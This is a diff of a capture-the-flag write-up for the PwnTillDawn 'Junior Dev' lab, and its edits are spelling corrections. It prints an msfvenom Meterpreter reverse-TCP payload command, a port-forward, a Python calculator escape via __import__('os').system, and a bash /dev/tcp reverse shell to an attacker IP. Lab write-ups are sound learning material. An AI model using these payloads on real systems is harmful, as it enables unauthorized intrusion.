r0b0tG4nG/r0b0tg4ng.github.io/_posts/2021-11-27-Junior Dev.md

 ``msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.66.66.78 LPORT=9002 -f elf -o 9002msf``<br>
 ![image](https://user-images.githubusercontent.com/67085453/143765952-d511e7e9-e049-4a7a-9360-38e69b2548d4.png)<br>

-The next thing to do is to transfer the payload to the target and execute it while msfconsole is listerning fortrt incoming connections.<br>
+The next thing to do is to transfer the payload to the target and execute it while msfconsole is listerning for incoming connections.<br>
 ![image](https://user-images.githubusercontent.com/67085453/143765957-aa29bf3e-872b-4760-b63b-ffedb1e21e22.png)<br>

 When the payload is executed on the target, we should recieve a connection back on `msfconsole`.
-Once the connection is in, we can port-forward the target intertnal port `8080` to our attacking machine using the `portfwd`command in msfconsole<br>
+Once the connection is in, we can port-forward the target intertnal port `8080` to our attacking machine using the `portfwd` command in msfconsole<br>
 `portfwd add -l 8080 -p 8080 -r 127.0.0.1`<br>
 ![image](https://user-images.githubusercontent.com/67085453/143765963-00518744-c295-44f9-820a-9db9a7dcfcbf.png)<br>

-Now that we the target port `8080` connected back to our attacking machine, wehn visited, we found a python maths console.<br>
+Now that we the target port `8080` connected back to our attacking machine, when visited, we found a python math console.<br>
 ![image](https://user-images.githubusercontent.com/67085453/143765968-cf05e59b-727e-4377-ac76-ba25ed07ce10.png)<br>

-Since it's a simple python maths calculator, we can easily bypasss the pythin functions and gain a remote code execution.
+Since it's a simple python math calculator, we can easily bypass the python functions and gain a remote code execution.
 To do this, we will use `__import__("os").system("")`<br>

-We created a bash file with contains our bash reverse liner. a simple bash script, transfered the bash file to the target.
+We created a bash file with contains our bash reverse liner. a simple bash script, transferred the bash file to the target.
 ```shell
 #!/bin/bash
 bash -c  'bash -i>&/dev/tcp/10.66.66.78/9002 0>&1'
 ```
 <br>

-Once our bash file is on the target, we can execute the bash file using the pythin calculator.
+Once our bash file is on the target, we can execute the bash file using the python calculator.
 We simply do this using the command
 `__import__("os").system("/bin/bash /tmp/shell.sh")`<br>
 ![image](https://user-images.githubusercontent.com/67085453/143765976-251cd43b-7e6d-4852-895b-6b2ba81033c9.png)<br><br>

-Referrence: <a href="https://online.pwntilldawn.com/">PwnTillDawn Online battlefield</a>
+Reference: <a href="https://online.pwntilldawn.com/">PwnTillDawn Online battlefield</a>